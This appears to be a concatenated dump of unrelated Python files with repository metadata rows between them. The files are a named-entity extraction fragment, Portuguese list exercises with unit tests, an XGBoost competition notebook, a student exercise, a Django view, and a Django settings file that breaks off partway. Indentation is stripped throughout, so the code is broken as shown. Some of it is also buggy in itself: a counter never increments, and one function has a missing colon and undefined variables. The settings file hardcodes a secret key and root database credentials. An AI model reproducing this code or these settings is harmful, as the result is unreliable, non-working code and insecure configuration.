position = frag.split('CharacterOffsetBegin=')[1].split(' ')[0]
pos = convertoffset(numlist,keyposition[n],int(position),obj[0][0])
current[0].append([text,int(position),pos])
elif 'PartOfSpeech=N' in frag:
text = frag.split('Text=')[1].split(' ')[0]
position = frag.split('CharacterOffsetBegin=')[1].split(' ')[0]
pos = convertoffset(numlist,keyposition[n],int(position),obj[0][0])
lex = []
for synset in wn.synsets(text):
lex.append(synset.lexname())
if lex == []:
continue
elif float(lex.count('noun.person'))/float(len(lex)) >= 0.4:
current[0].append([text,int(position),pos])
word = loads(server.parse(obj[0][0]))['sentences'][0]['words'][0]
if word[1]['PartOfSpeech'] == 'NNP':
text = word[0]
position = word[1]['CharacterOffsetBegin']
pos = convertoffset(numlist,keyposition[n],int(position),obj[0][0])
current[0].append([text,int(position),pos])
elif 'N' in word[1]['PartOfSpeech']:
text = word[0]
position = word[1]['CharacterOffsetBegin']
pos = convertoffset(numlist,keyposition[n],int(position),obj[0][0])
lex = []
for synset in wn.synsets(text):
lex.append(synset.lexname())
if lex == []:
pass
elif float(lex.count('noun.person'))/float(len(lex)) >= 0.4:
current[0].append([text,int(position),pos])
previous = []
for i in range(len(obj[1])):
previous.append([])
temp = []
for x in range(len(loads(server.parse(obj[1][i]))['sentences'])):
try:
temp = temp + loads(server.parse(obj[1][i]))['sentences'][x]['parsetree'].split('] [')
temp = temp + loads(server.parse(obj[1][i]))['sentences'][x]['words'][0]
except IndexError:
continue
for frag in temp:
if 'PartOfSpeech=NNP' in frag:
text = frag.split('Text=')[1].split(' ')[0]
position = frag.split('CharacterOffsetBegin=')[1].split(' ')[0]
pos = convertoffset(numlist,i+1,int(position),obj[1][i])
previous[i].append([text,int(position),pos])
elif 'PartOfSpeech=N' in frag:
text = frag.split('Text=')[1].split(' ')[0]
position = frag.split('CharacterOffsetBegin=')[1].split(' ')[0]
pos = convertoffset(numlist,i+1,int(position),obj[1][i])
lex = []
for synset in wn.synsets(text):
lex.append(synset.lexname())
if lex == []:
continue
elif float(lex.count('noun.person'))/float(len(lex)) >= 0.4:
previous[i].append([text,int(position),pos])
word = loads(server.parse(obj[1][i]))['sentences'][0]['words'][0]
if word[1]['PartOfSpeech'] == 'NNP':
text = word[0]
position = word[1]['CharacterOffsetBegin']
pos = convertoffset(numlist,i+1,int(position),obj[1][i])
previous[i].append([text,int(position),pos])
elif 'N' in word[1]['PartOfSpeech']:
text = word[0]
position = word[1]['CharacterOffsetBegin']
pos = convertoffset(numlist,i+1,int(position),obj[1][i])
lex = []
for synset in wn.synsets(text):
lex.append(synset.lexname())
if lex == []:
pass
elif float(lex.count('noun.person'))/float(len(lex)) >= 0.4:
previous[i].append([text,int(position),pos])
following = []
for j in range(len(obj[2])):
following.append([])
temp = []
for y in range(len(loads(server.parse(obj[2][j]))['sentences'])):
try:
temp = temp + loads(server.parse(obj[2][j]))['sentences'][y]['words'][0]
temp = temp + loads(server.parse(obj[2][j]))['sentences'][y]['parsetree'].split('] [')
except IndexError:
continue
for frag in temp:
if 'PartOfSpeech=NNP' in frag:
text = frag.split('Text=')[1].split(' ')[0]
position = frag.split('CharacterOffsetBegin=')[1].split(' ')[0]
pos = convertoffset(numlist,keyposition[n]+j+1,int(position),obj[2][j])
following[j].append([text,int(position),pos])
elif 'PartOfSpeech=N' in frag:
text = frag.split('Text=')[1].split(' ')[0]
position = frag.split('CharacterOffsetBegin=')[1].split(' ')[0]
pos = convertoffset(numlist,keyposition[n]+j+1,int(position),obj[2][j])
lex = []
for synset in wn.synsets(text):
lex.append(synset.lexname())
if lex == []:
continue
if float(lex.count('noun.person'))/float(len(lex)) >= 0.4:
following[j].append([text,int(position),pos])
if word[1]['PartOfSpeech'] == 'NNP':
text = word[0]
position = word[1]['CharacterOffsetBegin']
pos = convertoffset(numlist,keyposition[n]+j+1,int(position),obj[2][j])
following[j].append([text,int(position),pos])
elif 'N' in word[1]['PartOfSpeech']:
text = word[0]
position = word[1]['CharacterOffsetBegin']
pos = convertoffset(numlist,keyposition[n]+j+1,int(position),obj[2][j])
lex = []
for synset in wn.synsets(text):
lex.append(synset.lexname())
if lex == []:
pass
elif float(lex.count('noun.person'))/float(len(lex)) >= 0.4:
following[j].append([text,int(position),pos])
entities.append([current,previous,following])
n = n +1
return entities
entities = ner(instance)
entities_new = entities[:]
#print entities
#entities [name, offset in the paragraph, word position in the instance]
# In[8]:
#combine contiguous name entities and separate those within and outside quotation marks
def contiguous(instance,namelist,ni,cls,nl):
i = 0
t = len(namelist)-1
newlist = {}
newlist['in'] = []
newlist['out'] = []
while i < t:
if namelist[i+1][1]-namelist[i][1] == len(namelist[i][0])+1 and instance[ni][cls][nl][namelist[i][1]+len(namelist[i][0])] == ' ':
namelist[i][0] = namelist[i][0]+' '+namelist[i+1][0]
namelist.pop(i+1)
t = t - 1
i = i - 1
i = i + 1
for obj in namelist:
if instance[ni][cls][nl][0:obj[1]].count('"')%2 == 1:
newlist['in'].append(obj)
else:
newlist['out'].append(obj)
return newlist
for i in range(len(entities)):
for j in range(3):
for k in range(len(instance[i][j])):
entities_new[i][j][k] = contiguous(instance,entities[i][j][k],i,j,k)
simplejson.dump(entities_new, res)
res.close()
| [
"[email protected]"
] | |
172b69d8e0f85da27da0cd12868c709c8e151f19 | 489d26a949b99b784c6cadc6e9b69715377a89c9 | /script-list.py | 5fe37396fc98b02ba91c8a3d105700853a7c101e | [] | no_license | elainemicheletti/exercicios-de-logica | 97d610eac62d64fe256d7a7638def124c3a86363 | 64ee18925e088103276bd5ef6a35ebf27f971cd1 | refs/heads/master | 2021-05-04T11:23:58.682502 | 2020-08-17T23:48:53 | 2020-08-17T23:48:53 | 46,579,695 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,240 | py | ## Basic Python Exercises - list
##
## Tuplas .sort() sorted() e fatiamento de sequencias
#!/usr/bin/python -tt
# coding: urf-8
import unittest
# dado a lista se strings 'words', retoarnar o total de strings, se cada palavra for maior ou igual a dois
# e se o primeiro caracter coincidir com o último
def match_ends(words):
count = 0
for word in words:
if len(word) >= 2 and word[0] == word[-1]:
count = count
return count
# dado uma lista de strings, retornar uma lista de string ordenada, exceto todo grupo de strings que inicie com 'x' que virá primeiro
#
# dica: poderá fazer com duas listas ordenando cada uma delas e depois combinando-as
def front_x(words):
lista_x = []
lista_normal = []
for word in words:
if word[0] == "x":
lista_x.append(word)
else:
lista_normal.append(word)
lista_x.sort()
lista_normal.sort()
return lista_x + lista_normal
# dado uma lista de tuplas não vazias, retornar uma lista ordenada pelo último elemento de cada tupla
#
# dica: use a função personalizada 'last()' para extrair o último elemento, ela deverá passar no segundo parâmetro da função
def sort_last(tuples):
return sorted(tuples, key=last)
def last(a):
return a[-1]
class MyTest(unittest.TestCase):
def test_match_ends(self):
self.assertEqual(match_ends(['aba', 'xyz', 'aa', 'x', 'bbb']), 3)
self.assertEqual(match_ends(['', 'x', 'xy', 'xyx', 'xx']), 2)
self.assertEqual(match_ends(['aaa', 'be', 'abc', 'hello']), 1)
def test_front_x(self):
self.assertEqual(front_x(['bbb', 'ccc', 'axx', 'xzz', 'xaa']), ['xaa', 'xzz', 'axx', 'bbb', 'ccc'])
self.assertEqual(front_x(['ccc', 'bbb', 'aaa', 'xcc', 'xaa']), ['xaa', 'xcc', 'aaa', 'bbb', 'ccc'])
self.assertEqual(front_x(['mix', 'xyz', 'apple', 'xanadu', 'aardvark']), ['xanadu', 'xyz', 'aardvark', 'apple', 'mix'])
def test_sort_last(self):
self.assertEqual(sort_last([(1, 3), (3, 2), (2, 1)]), [(2, 1), (3, 2), (1, 3)])
self.assertEqual(sort_last([(2, 3), (1, 2), (3, 1)]), [(3, 1), (1, 2), (2, 3)])
self.assertEqual(sort_last([(1, 7), (1, 3), (3, 4, 5), (2, 2)]), [(2, 2), (1, 3), (3, 4, 5), (1, 7)])
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
66c765949fbc0f68d3fa563f1170b7476d4e8341 | f3e5f7da6b9c71f99fc77618d8e05819b050ca2a | /old/lyons-v4.py | 1df5f86d77c95e7bcbc05343561d24a088aa6b8c | [] | no_license | chris-seals/dsb2019 | 5464003a240d48ce251e2ea24a4bc4c7897bcb82 | 139315280f4d5d0de5771257038bdbdc8e5338df | refs/heads/cjs | 2020-12-06T23:27:17.113657 | 2020-02-10T21:00:58 | 2020-02-10T21:00:58 | 232,579,196 | 0 | 0 | null | 2020-01-08T15:17:37 | 2020-01-08T14:16:08 | Jupyter Notebook | UTF-8 | Python | false | false | 23,743 | py | # %% [code]
# This Python 3 environment comes with many helpful analytics libraries installed
# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python
# For example, here's several helpful packages to load in
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
import matplotlib.pyplot as plt
import xgboost as xgb
from xgboost import XGBClassifier, XGBRegressor
from xgboost import plot_importance
from catboost import CatBoostRegressor
from matplotlib import pyplot
import shap
import random
import os
for dirname, _, filenames in os.walk('/kaggle/input'):
for filename in filenames:
print(os.path.join(dirname, filename))
# Any results you write to the current directory are saved as output.
from time import time
from tqdm import tqdm_notebook as tqdm
from collections import Counter
from scipy import stats
import lightgbm as lgb
from sklearn.metrics import cohen_kappa_score, mean_squared_error
from sklearn.model_selection import KFold, StratifiedKFold
import gc
import json
pd.set_option('display.max_columns', 1000)
# %% [markdown]
# # Notes
# * Check the distribution of the target variable of the out of folds score and the prediction distribution. A good model should more or less have the same distribution.
# %% [code]
def eval_qwk_lgb_regr(y_true, y_pred):
"""
Fast cappa eval function for lgb.
"""
dist = Counter(reduce_train['accuracy_group'])
for k in dist:
dist[k] /= len(reduce_train)
reduce_train['accuracy_group'].hist()
acum = 0
bound = {}
for i in range(3):
acum += dist[i]
bound[i] = np.percentile(y_pred, acum * 100)
def classify(x):
if x <= bound[0]:
return 0
elif x <= bound[1]:
return 1
elif x <= bound[2]:
return 2
else:
return 3
y_pred = np.array(list(map(classify, y_pred))).reshape(y_true.shape)
return 'cappa', qwk3(y_true, y_pred), True
# %% [code]
def cohenkappa(ypred, y):
y = y.get_label().astype("int")
ypred = ypred.reshape((4, -1)).argmax(axis = 0)
loss = cohen_kappa_score(y, ypred, weights = 'quadratic')
return "cappa", loss, True
# %% [code]
def qwk3(a1, a2, max_rat=3):
assert(len(a1) == len(a2))
a1 = np.asarray(a1, dtype=int)
a2 = np.asarray(a2, dtype=int)
hist1 = np.zeros((max_rat + 1, ))
hist2 = np.zeros((max_rat + 1, ))
o = 0
for k in range(a1.shape[0]):
i, j = a1[k], a2[k]
hist1[i] += 1
hist2[j] += 1
o += (i - j) * (i - j)
e = 0
for i in range(max_rat + 1):
for j in range(max_rat + 1):
e += hist1[i] * hist2[j] * (i - j) * (i - j)
e = e / a1.shape[0]
return 1 - o / e
# %% [code]
def read_data():
print('Reading train.csv file....')
train = pd.read_csv('data/train.csv')
print('Training.csv file have {} rows and {} columns'.format(train.shape[0], train.shape[1]))
print('Reading test.csv file....')
test = pd.read_csv('data/test.csv')
print('Test.csv file have {} rows and {} columns'.format(test.shape[0], test.shape[1]))
print('Reading train_labels.csv file....')
train_labels = pd.read_csv('data/train_labels.csv')
print('Train_labels.csv file have {} rows and {} columns'.format(train_labels.shape[0], train_labels.shape[1]))
return train, test, train_labels
# %% [code]
def encode_title(train, test, train_labels):
# encode title
train['title_event_code'] = list(map(lambda x, y: str(x) + '_' + str(y), train['title'], train['event_code']))
test['title_event_code'] = list(map(lambda x, y: str(x) + '_' + str(y), test['title'], test['event_code']))
all_title_event_code = list(set(train["title_event_code"].unique()).union(test["title_event_code"].unique()))
# make a list with all the unique 'titles' from the train and test set
list_of_user_activities = list(set(train['title'].unique()).union(set(test['title'].unique())))
# make a list with all the unique 'event_code' from the train and test set
list_of_event_code = list(set(train['event_code'].unique()).union(set(test['event_code'].unique())))
list_of_event_id = list(set(train['event_id'].unique()).union(set(test['event_id'].unique())))
# make a list with all the unique worlds from the train and test set
list_of_worlds = list(set(train['world'].unique()).union(set(test['world'].unique())))
# create a dictionary numerating the titles
activities_map = dict(zip(list_of_user_activities, np.arange(len(list_of_user_activities))))
activities_labels = dict(zip(np.arange(len(list_of_user_activities)), list_of_user_activities))
activities_world = dict(zip(list_of_worlds, np.arange(len(list_of_worlds))))
assess_titles = list(set(train[train['type'] == 'Assessment']['title'].value_counts().index).union(set(test[test['type'] == 'Assessment']['title'].value_counts().index)))
# replace the text titles with the number titles from the dict
train['title'] = train['title'].map(activities_map)
test['title'] = test['title'].map(activities_map)
train['world'] = train['world'].map(activities_world)
test['world'] = test['world'].map(activities_world)
train_labels['title'] = train_labels['title'].map(activities_map)
win_code = dict(zip(activities_map.values(), (4100*np.ones(len(activities_map))).astype('int')))
# then, it set one element, the 'Bird Measurer (Assessment)' as 4110, 10 more than the rest
win_code[activities_map['Bird Measurer (Assessment)']] = 4110
# convert text into datetime
train['timestamp'] = pd.to_datetime(train['timestamp'])
test['timestamp'] = pd.to_datetime(test['timestamp'])
return train, test, train_labels, win_code, list_of_user_activities, list_of_event_code, activities_labels, assess_titles, list_of_event_id, all_title_event_code
# %% [code]
# this is the function that convert the raw data into processed features
def get_data(user_sample, test_set=False):
'''
The user_sample is a DataFrame from train or test where the only one
installation_id is filtered
And the test_set parameter is related with the labels processing, that is only requered
if test_set=False
'''
# Constants and parameters declaration
last_activity = 0
user_activities_count = {'Clip':0, 'Activity': 0, 'Assessment': 0, 'Game':0}
# new features: time spent in each activity
last_session_time_sec = 0
accuracy_groups = {0:0, 1:0, 2:0, 3:0}
all_assessments = []
accumulated_accuracy_group = 0
accumulated_accuracy = 0
accumulated_correct_attempts = 0
accumulated_uncorrect_attempts = 0
accumulated_actions = 0
counter = 0
time_first_activity = float(user_sample['timestamp'].values[0])
durations = []
last_accuracy_title = {'acc_' + title: -1 for title in assess_titles}
event_code_count: Dict[str, int] = {ev: 0 for ev in list_of_event_code}
event_id_count: Dict[str, int] = {eve: 0 for eve in list_of_event_id}
title_count: Dict[str, int] = {eve: 0 for eve in activities_labels.values()}
title_event_code_count: Dict[str, int] = {t_eve: 0 for t_eve in all_title_event_code}
# last features
sessions_count = 0
# itarates through each session of one instalation_id
for i, session in user_sample.groupby('game_session', sort=False):
# i = game_session_id
# session is a DataFrame that contain only one game_session
# get some sessions information
session_type = session['type'].iloc[0]
session_title = session['title'].iloc[0]
session_title_text = activities_labels[session_title]
game_session = session['game_session'].iloc[0]
# for each assessment, and only this kind off session, the features below are processed
# and a register are generated
if (session_type == 'Assessment') & (test_set or len(session)>1):
# search for event_code 4100, that represents the assessments trial
all_attempts = session.query(f'event_code == {win_code[session_title]}')
# then, check the numbers of wins and the number of losses
true_attempts = all_attempts['event_data'].str.contains('true').sum()
false_attempts = all_attempts['event_data'].str.contains('false').sum()
# copy a dict to use as feature template, it's initialized with some itens:
# {'Clip':0, 'Activity': 0, 'Assessment': 0, 'Game':0}
features = user_activities_count.copy()
features.update(last_accuracy_title.copy())
features.update(event_code_count.copy())
features.update(event_id_count.copy())
features.update(title_count.copy())
features.update(title_event_code_count.copy())
features.update(last_accuracy_title.copy())
features['installation_session_count'] = sessions_count
variety_features = [('var_event_code', event_code_count),
('var_event_id', event_id_count),
('var_title', title_count),
('var_title_event_code', title_event_code_count)]
for name, dict_counts in variety_features:
arr = np.array(list(dict_counts.values()))
features[name] = np.count_nonzero(arr)
# get installation_id for aggregated features
features['installation_id'] = session['installation_id'].iloc[-1]
features['game_session'] = game_session
# add title as feature, remembering that title represents the name of the game
features['session_title'] = session['title'].iloc[0]
# the 4 lines below add the feature of the history of the trials of this player
# this is based on the all time attempts so far, at the moment of this assessment
features['accumulated_correct_attempts'] = accumulated_correct_attempts
features['accumulated_uncorrect_attempts'] = accumulated_uncorrect_attempts
accumulated_correct_attempts += true_attempts
accumulated_uncorrect_attempts += false_attempts
# the time spent in the app so far
if durations == []:
features['duration_mean'] = 0
features['duration_std'] = 0
else:
features['duration_mean'] = np.mean(durations)
features['duration_std'] = np.std(durations)
durations.append((session.iloc[-1, 2] - session.iloc[0, 2] ).seconds)
# the accurace is the all time wins divided by the all time attempts
features['accumulated_accuracy'] = accumulated_accuracy/counter if counter > 0 else 0
accuracy = true_attempts/(true_attempts+false_attempts) if (true_attempts+false_attempts) != 0 else 0
accumulated_accuracy += accuracy
last_accuracy_title['acc_' + session_title_text] = accuracy
# a feature of the current accuracy categorized
# it is a counter of how many times this player was in each accuracy group
if accuracy == 0:
features['accuracy_group'] = 0
elif accuracy == 1:
features['accuracy_group'] = 3
elif accuracy == 0.5:
features['accuracy_group'] = 2
else:
features['accuracy_group'] = 1
features.update(accuracy_groups)
accuracy_groups[features['accuracy_group']] += 1
# mean of the all accuracy groups of this player
features['accumulated_accuracy_group'] = accumulated_accuracy_group/counter if counter > 0 else 0
accumulated_accuracy_group += features['accuracy_group']
# how many actions the player has done so far, it is initialized as 0 and updated some lines below
features['accumulated_actions'] = accumulated_actions
# there are some conditions to allow this features to be inserted in the datasets
# if it's a test set, all sessions belong to the final dataset
# it it's a train, needs to be passed throught this clausule: session.query(f'event_code == {win_code[session_title]}')
# that means, must exist an event_code 4100 or 4110
if test_set:
all_assessments.append(features)
elif true_attempts+false_attempts > 0:
all_assessments.append(features)
counter += 1
sessions_count += 1
# this piece counts how many actions was made in each event_code so far
def update_counters(counter: dict, col: str):
num_of_session_count = Counter(session[col])
for k in num_of_session_count.keys():
x = k
if col == 'title':
x = activities_labels[k]
counter[x] += num_of_session_count[k]
return counter
event_code_count = update_counters(event_code_count, "event_code")
event_id_count = update_counters(event_id_count, "event_id")
title_count = update_counters(title_count, 'title')
title_event_code_count = update_counters(title_event_code_count, 'title_event_code')
# counts how many actions the player has done so far, used in the feature of the same name
accumulated_actions += len(session)
if last_activity != session_type:
user_activities_count[session_type] += 1
last_activitiy = session_type
# if it't the test_set, only the last assessment must be predicted, the previous are scraped
if test_set:
return all_assessments[-1]
# in the train_set, all assessments goes to the dataset
return all_assessments
# %% [code]
def get_train_and_test(train, test):
compiled_train = []
compiled_test = []
assessment_sessions_by_instid = {}
# Loop through each train installation id
for ins_id, user_sample in tqdm(train.groupby('installation_id', sort = False),
total = train['installation_id'].nunique()):
compiled_train += get_data(user_sample, test_set = False)
reduce_train = pd.DataFrame(compiled_train)
del compiled_train
# Loop through each test installation id
for ins_id, user_sample in tqdm(test.groupby('installation_id', sort = False),
total = test['installation_id'].nunique()):
test_data = get_data(user_sample, test_set = True)
compiled_test.append(test_data)
reduce_test = pd.DataFrame(compiled_test)
del compiled_test
categoricals = ['session_title']
return reduce_train, reduce_test, categoricals
# %% [code]
class Base_Model(object):
def __init__(self, train_df, test_df, features, categoricals=[], n_splits=5, verbose=True):
self.train_df = train_df
self.test_df = test_df
self.features = features
self.n_splits = n_splits
self.categoricals = categoricals
self.target = 'accuracy_group'
self.cv = self.get_cv()
self.verbose = verbose
self.params = self.get_params()
self.y_pred, self.score, self.model = self.fit()
def train_model(self, train_set, val_set):
raise NotImplementedError
def get_cv(self):
cv = StratifiedKFold(n_splits=self.n_splits, shuffle=True, random_state=42)
return cv.split(self.train_df, self.train_df[self.target])
def get_params(self):
raise NotImplementedError
def convert_dataset(self, x_train, y_train, x_val, y_val):
raise NotImplementedError
def convert_x(self, x):
return x
def fit(self):
oof_pred = np.zeros((len(reduce_train), ))
y_pred = np.zeros((len(reduce_test), ))
for fold, (train_idx, val_idx) in enumerate(self.cv):
try:
x_train, x_val = self.train_df[self.features].iloc[train_idx], self.train_df[self.features].iloc[val_idx]
y_train, y_val = self.train_df[self.target][train_idx], self.train_df[self.target][val_idx]
train_set, val_set = self.convert_dataset(x_train, y_train, x_val, y_val)
model = self.train_model(train_set, val_set)
conv_x_val = self.convert_x(x_val)
oof_pred[val_idx] = model.predict(conv_x_val).reshape(oof_pred[val_idx].shape)
x_test = self.convert_x(self.test_df[self.features])
y_pred += model.predict(x_test).reshape(y_pred.shape) / self.n_splits
print('Partial score of fold {} is: {}'.format(fold, eval_qwk_lgb_regr(y_val, oof_pred[val_idx])[1]))
_, loss_score, _ = eval_qwk_lgb_regr(self.train_df[self.target], oof_pred)
except:
print('Error training: val_idx = ', val_idx)
if self.verbose:
print('Our oof cohen kappa score is: ', loss_score)
return y_pred, loss_score, model
# %% [code]
class Xgb_Model(Base_Model):
def train_model(self, train_set, val_set):
verbosity = 100 if self.verbose else 0
return xgb.train(self.params, train_set,
num_boost_round=5000, evals=[(train_set, 'train'), (val_set, 'val')],
verbose_eval=verbosity, early_stopping_rounds=100)
def convert_dataset(self, x_train, y_train, x_val, y_val):
train_set = xgb.DMatrix(x_train, y_train)
val_set = xgb.DMatrix(x_val, y_val)
return train_set, val_set
def convert_x(self, x):
return xgb.DMatrix(x)
def get_params(self):
params = {'colsample_bytree': 0.8,
'learning_rate': 0.01,
'max_depth': 10,
'subsample': 1,
'objective':'reg:squarederror',
#'eval_metric':'rmse',
'min_child_weight':3,
'gamma':0.25,
'n_estimators':5000}
return params
# %% [code]
def remove_dead_weight(df, train_labels, test_set=False):
data_df = pd.DataFrame(df).copy()
data_df = data_df[data_df.world != 'NONE']
# Filter out only the installation ids with assessments
keep_id = data_df[data_df.type == "Assessment"][['installation_id']].drop_duplicates()
data_df = pd.merge(data_df, keep_id, on="installation_id", how="inner")
# If training set then make sure the installation ids are in the labels and remove assements not in the labels
if test_set == False:
data_df.reset_index()
data_df = data_df[data_df.installation_id.isin(train_labels.installation_id.unique())]
assessments = data_df[data_df.type == 'Assessment']
assessments = assessments[~assessments.game_session.isin(train_labels.game_session)]
data_df = data_df[~data_df.game_session.isin(assessments.game_session)]
data_df.reset_index()
return data_df
# %% [code]
# read data
train, test, train_labels = read_data()
# %% [code]
# remove unwanted data
train = remove_dead_weight(train, train_labels, test_set=False)
test = remove_dead_weight(test, train_labels, test_set=True)
# %% [code]
# get usefull dict with maping encode
train, test, train_labels, win_code, list_of_user_activities, list_of_event_code, activities_labels, assess_titles, list_of_event_id, all_title_event_code = encode_title(train, test, train_labels)
# %% [code]
# tranform function to get the train and test set
reduce_train, reduce_test, categoricals = get_train_and_test(train, test)
# %% [code]
# Delete train and terst to free up resources
del train
del test
reduce_train.to_csv('reduce_train.csv', index=False)
reduce_test.to_csv('reduce_test.csv', index=False)
# %% [code]
# Add the accuracy group vals
reduce_train = reduce_train.set_index('game_session')
train_labels = train_labels.set_index('game_session')
reduce_train.update(train_labels)
# %% [code]
reduce_train = reduce_train.reset_index()
train_labels = train_labels.reset_index()
# %% [code]
def stract_hists(feature, train=reduce_train, test=reduce_test, adjust=False, plot=False):
n_bins = 10
train_data = train[feature]
test_data = test[feature]
if adjust:
test_data *= train_data.mean() / test_data.mean()
perc_90 = np.percentile(train_data, 95)
train_data = np.clip(train_data, 0, perc_90)
test_data = np.clip(test_data, 0, perc_90)
train_hist = np.histogram(train_data, bins=n_bins)[0] / len(train_data)
test_hist = np.histogram(test_data, bins=n_bins)[0] / len(test_data)
msre = mean_squared_error(train_hist, test_hist)
if plot:
print(msre)
plt.bar(range(n_bins), train_hist, color='blue', alpha=0.5)
plt.bar(range(n_bins), test_hist, color='red', alpha=0.5)
plt.show()
return msre
stract_hists('Magma Peak - Level 1_2000', adjust=False, plot=True)
# %% [code]
# call feature engineering function
features = reduce_train.loc[(reduce_train.sum(axis=1) != 0), (reduce_train.sum(axis=0) != 0)].columns # delete useless columns
features = [x for x in features if x not in ['accuracy_group', 'game_session', 'installation_id']]
# %% [code]
counter = 0
to_remove = []
for feat_a in features:
for feat_b in features:
if feat_a != feat_b and feat_a not in to_remove and feat_b not in to_remove:
c = np.corrcoef(reduce_train[feat_a], reduce_train[feat_b])[0][1]
if c > 0.995:
counter += 1
to_remove.append(feat_b)
print('{}: FEAT_A: {} FEAT_B: {} - Correlation: {}'.format(counter, feat_a, feat_b, c))
# %% [code]
to_exclude = []
ajusted_test = reduce_test.copy()
for feature in ajusted_test.columns:
if feature not in ['accuracy_group', 'installation_id', 'game_session' 'session_title']:
try:
data = reduce_train[feature]
train_mean = data.mean()
data = ajusted_test[feature]
test_mean = data.mean()
error = stract_hists(feature, adjust=True)
ajust_factor = train_mean / test_mean
if ajust_factor > 10 or ajust_factor < 0.1:# or error > 0.01:
to_exclude.append(feature)
print(feature, train_mean, test_mean, error)
else:
ajusted_test[feature] *= ajust_factor
except:
to_exclude.append(feature)
# %% [code]
features = [x for x in features if x not in (to_exclude + to_remove)]
# %% [code] {"scrolled":false}
xgb_model = Xgb_Model(reduce_train, reduce_test, features, categoricals=categoricals)
# %% [code]
final_pred = xgb_model.y_pred
dist = Counter(reduce_train['accuracy_group'])
for k in dist:
dist[k] /= len(reduce_train)
reduce_train['accuracy_group'].hist()
acum = 0
bound = {}
for i in range(3):
acum += dist[i]
bound[i] = np.percentile(final_pred, acum * 100)
print(bound)
def classify(x):
if x <= bound[0]:
return 0
elif x <= bound[1]:
return 1
elif x <= bound[2]:
return 2
else:
return 3
final_pred = np.array(list(map(classify, final_pred)))
# %% [code]
submission = pd.DataFrame()
submission['installation_id'] = reduce_test['installation_id']
submission['accuracy_group'] = final_pred.astype(int)
submission.to_csv('submission.csv', index=False)
submission['accuracy_group'].value_counts(normalize=True)
# %% [code]
| [
"[email protected]"
] | |
1d0c5840f42c513e12b08defc9cfd08a7622ff34 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/141/usersdata/164/62144/submittedfiles/av2_p2_m2.py | cf2af6c995fd2f98bb7c17c2b52705db0a575052 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 430 | py | # -*- coding: utf-8 -*-
def qvidas (pe, ps):
for i in range (0, len(a)+1, 1):
if (pe==(a[i]-1))
soma=soma+a[i-1]
if (ps==a[i]-1):
soma=soma+a[i-1]
return(soma)
n=int(input('Número de elementos da lista: '))
a=[]
for i in range (0, n, 1):
vidas=int(input('Número de vidas: '))
a.append(vidas)
pe=int(input('Porta de entrada: '))
ps=int(input('Porta de saída: '))
| [
"[email protected]"
] | |
00155d659580b1f1caabc65aa54bdd5a0c4fa884 | 43b6b312005ec2609e64d7137c98aa044470ab8e | /customer/views.py | 6a9ea875a89919df1723f7256c459871383c2fe7 | [] | no_license | Jon005/BookingSystem | 85e7181ff39ace2a76254f2ee008706901f5fd92 | 41822c631da82d5932c160d6370caaba4147c88b | refs/heads/master | 2023-06-07T20:52:01.417473 | 2021-06-27T13:09:48 | 2021-06-27T13:09:48 | 380,740,211 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 186 | py | from django.shortcuts import render
# Create your views here.
def home(request):
context={
'value': 'customer'
}
return render(request,'base.html',context)
| [
"[email protected]"
] | |
1feada97f4ed28e5f514582cc44a427ae76d7dc6 | 1fe56144905244643dbbab69819720bc16031657 | /.history/book/settings_20210422150351.py | 88b3ae72a9c9d1ae8132d3eaec3669704089145b | [] | no_license | RaghdaMadiane/django | 2052fcdd532f9678fefb034bd60e44f466bd9759 | 6ca3f87f0b72880f071d90968f0a63ea5badcca8 | refs/heads/master | 2023-04-15T17:28:25.939823 | 2021-04-24T22:33:21 | 2021-04-24T22:33:21 | 361,279,372 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,321 | py | """
Django settings for book project.
Generated by 'django-admin startproject' using Django 3.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-0^$e#*3*b=n_sqe059#ckyy-)ikq+90p@&_x2g=be#yz&s7nn='
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'isbn_field',
'books',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'book.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'book.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': "books",
'USER':"root",
'PASSWORD':"root",
'HOST':"localhost"
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
